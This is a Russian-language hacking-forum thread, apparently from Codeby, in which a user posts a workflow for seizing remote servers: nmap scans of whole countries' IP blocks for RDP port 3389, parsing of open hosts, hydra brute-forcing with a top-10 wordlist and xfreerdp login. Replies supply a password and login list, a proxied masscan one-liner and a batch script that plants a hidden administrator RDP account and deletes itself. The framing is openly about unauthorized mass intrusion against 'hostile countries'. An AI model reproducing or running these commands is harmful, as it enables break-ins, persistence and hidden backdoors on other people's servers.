• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья В поисках лучшего алгоритма по захвату дедиков в 2К18

CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // Мой опыт захвата дэдиксов с Лилы

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Оборачиваем следующие пару строк в скрипт, создаём пару txt-шек
http://www.ipdeny.com/ipblocks/ здесь можно посмотреть списки ипи-блоков по интересующей стране, но если воткнёте в подскан все разом, результаты придут к следующему году, так что не жадничаем и по-немножку сканим интересующую подсеть. Ведём журнал, записываем в блокнотик исследованые диапазоны.
Код:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv
CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.
Код:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt
PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): //ничего веселее гидры не нашлось, crowbar даёт ложные пробои и станится, поэтому загружаем пару топ-10 словарей (admin - password) и берём так сказать количеством, гидра хороша тем что не сильно нагружает процессор и в фоновом режиме может брутить сутки на пролёт не сильно задевая чувства верующих. В идеале думаю полезно разобраться и эксплойтить отсортированые ипишечки с Metasploit - но это уже тема для другой статьи, так как быстрых стандартных решений этого вопроса я пока не вижу.
Код:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp
TO CONTROL REMOTE DESKTOP : // входим в сбрученые оболочки и получаем профит
Код:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389
Так же предлагаю обсудить моё творчество, может у кого есть мысли на более рациональные варианты, пролистав весь рунет путнего по сабжу ничего не нашёл, решил выступить на данной конференции со своим мини-докладом. Всем спасибо за потраченое на мою статью время. Любая ваша критика, любые доводы уместны, но не обязательно будут приняты к рассмотрению. Удачных пробоев товарищи хэккерсы. Похороним экономику враждебно настроеных стран. Мы Анонисты - мы Легион! Так же отвечу на любые ньюби вопросы, если кто запутался в моей партянке.

6a472f3a81494f6d8a7a384181e85229.png
 
Последнее редактирование модератором:

MLNK

Mod. Ethical Hacking
Red Team
23.01.2018
560
706
BIT
1
Привет, всё очень симпатично, пока ещё есть время на редактирование статьи помести весь код в code теги
Код:
 CODE HERE
необходимую инфу найдёшь тут Правила оформления статей если чтото будет не понятно то пиши помогу разобраться

пс: арт прикольный есть ещё ?
 
C

Cyber Satori

Код:
первый блин комом увы, но я тебя запомнил) если критично, можете удалить статью - выкачу ремейк
 
Последнее редактирование модератором:

MLNK

Mod. Ethical Hacking
Red Team
23.01.2018
560
706
BIT
1
Код:
первый блин комом увы, но я тебя запомнил) если критично, можете удалить статью - выкачу ремейк
Зачем же удалять ))) я просто поправил оформление.
Жду новых статей. только не переводов а своих :)
 
C

Cyber Satori

инглиш тоже мой старичок, прививаю пипулсам вкус - зря ты так))) а текст фиолетовый ты один походу прочесть можешь, мне глаза разъело))) хоть я и величайший фэн кислотных трипсов
 
  • Нравится
Реакции: MLNK

MLNK

Mod. Ethical Hacking
Red Team
23.01.2018
560
706
BIT
1
инглиш тоже мой старичок, прививаю пипулсам вкус - зря ты так))) а текст фиолетовый ты один походу прочесть можешь, мне глаза разъело))) хоть я и величайший фэн кислотных трипсов
ЕСЛИ так то сорян тогда вообще отлично. про цвет да если тема тёмная то ппц )))
 
E

EWS

Как раз, первое чем решил заняться это брут RDP.
Отпишу что получится у человека без знаний и опыта, по твоему гайду.
Пока вопрос только где посмотреть топ login/pass list.
 
Последнее редактирование модератором:
  • Нравится
Реакции: RandellFox
C

Cyber Satori

да сам набросай что-нибудь вот мой пасс:
admin
123123123
123123
123
qwerty
password
pwd
administrator
12345
123456
12345678
123456789
letmein
abc123
passw0rd
pa$$w0rd

и логин листы:

administrator
admin
root
support
user
guest
server
adm1n
admin
User1
login
work

убери или добавь по желанию
 

mCstl

Green Team
08.08.2017
83
71
BIT
0
На форуме уже есть темы с тем как сканить большие диапазоны. Если это делать конкретно с Nmap (а не с masscan) то нужно выставить блоки адресов, а то сканирование будет длится вечность. + понизить кол-во. запросов по ретесту.
кстати ещё есть спарта которая должна смотеть сохраненные в rdp логины, но это я где то прочитал, сам ей не пользовался никогда, может стоит попробовать.
хз может самому попробовать такой сценарий написать, хотя никогда темой RDP особо не интересовался.
 
  • Нравится
Реакции: Tihon49
E

EWS

На форуме уже есть темы с тем как сканить большие диапазоны. Если это делать конкретно с Nmap (а не с masscan) то нужно выставить блоки адресов, а то сканирование будет длится вечность. + понизить кол-во. запросов по ретесту.
кстати ещё есть спарта которая должна смотеть сохраненные в rdp логины, но это я где то прочитал, сам ей не пользовался никогда, может стоит попробовать.
хз может самому попробовать такой сценарий написать, хотя никогда темой RDP особо не интересовался.
Как я понимаю софт о котором ты пишешь узнает логин RDP?В таком случае кол-во сбрученных дедиков на выходе должно быть в несколько раз больше, чем с листом логинов.
 

mCstl

Green Team
08.08.2017
83
71
BIT
0
Как я понимаю софт о котором ты пишешь узнает логин RDP?В таком случае кол-во сбрученных дедиков на выходе должно быть в несколько раз больше, чем с листом логинов.
Да, но это наверное руками придется делать, что вообще не комильфо. Короче посмотри спарту, может туда можно скрипты вписывать.
 

Bypass

Green Team
02.02.2018
451
579
BIT
0
Да, но это наверное руками придется делать, что вообще не комильфо. Короче посмотри спарту, может туда можно скрипты вписывать.
нет не руками, для линукс есть такие скрипты которые умеют дергать логины с rdp и подставлять пару лог пас login:login login:login123 и т.д
на гите видел несколько скриптов, название не запомнил, для шиндовcа на память - NLB, ForcerX, Z669.
 
E

EWS


Функции спарта:
Повторное использование найденного пароля в тестируемой инфраструктуре. Если в были найдены имена пользователей/пароли, то они сохраняются во внутренних списках слов, которые затем будут использованы на целях в той же сети (срочные новости: сисадмины используют одни и те же пароли).

Я так понимаю это то что нужно, но какими командами это используется, я про линукс только вчера узнал.И как связать одно с другим чтобы работал понятия не имею, есть какие либо примеры?
 
  • Нравится
Реакции: Sunnych и moon13

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.
Открытые порты можно собирать с помощью "Masscan" по моему он очень быстрей, можно ставить хоть 10000 потоков и информацию выдаёт доставерную. Пример работы "Masscan":

proxychains4 masscan -iL <файл с адресами, которые надо просканировать на открытые порты> -p3389 --rate=1000 |awk '{print $6}' > <файл куда буду сохраняться адреса с открытими портами>

"proxychains4" - работа через прокси (предварительно надо установить и настроить proxychains4)
"--rate=1000" - количество потоков
 
  • Нравится
Реакции: DefWolf

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Интересно. Надо попробовать. Обычно это делал по старинке: под Виндой запускал masscan, затем NlBrute. Профит есть, но мало.
 

DefWolf

Green Team
24.10.2017
288
794
BIT
0
Статья хорошая, для сканирования и брута лучше использовать вычислительную мощность сервера, а не своего компьютера.
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
может у кого есть мысли на более рациональные варианты
И кстате, тут на форуме есть одна статья, у которой как мне показалось большой потенциал Взлом RDP windows 2017 . В данный период пытаюсь оседлать этот способ, но пока не совсем получается, а почему не получается, можно прочитать в самом конце этой темы (я там написал суть проблемы)
 
T

The ROOT

Порт 3389 уже до дыр заезжен школьниками, которые ставять локеры <тут должен был быть жесткий мат, но я сдержался> используйте не стандартные порты, например:
3390-3410, 13389, 23389, 33389, 43389, 53389, 63389, 73389, 83389, 93389

И так же думаю пригодится батник, который на всех языках создаёт вашу учётку:
Только замените ВАШЛОГИН и ВАШПАРОЛЬ, пароль должен быть сложным, иначе не на всех серверах получится создать учетку
Код:
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user ВАШЛОГИН ВАШПАРОЛЬ /add
net localgroup %AdmGroup% ВАШЛОГИН /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" ВАШЛОГИН /add
net accounts /maxpwage:unlimited
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ВАШЛОГИН /t REG_DWORD /d 0 /f
attrib +H  C:\Users\ВАШЛОГИН /S /D
del %0
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Порт 3389 уже до дыр заезжен школьниками, которые ставять локеры <тут должен был быть жесткий мат, но я сдержался> используйте не стандартные порты, например:
3390-3410, 13389, 23389, 33389, 43389, 53389, 63389, 73389, 83389, 93389
Судя по всему ты тоже ищешь RDP с помощью брута, какой программой пользуешься?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!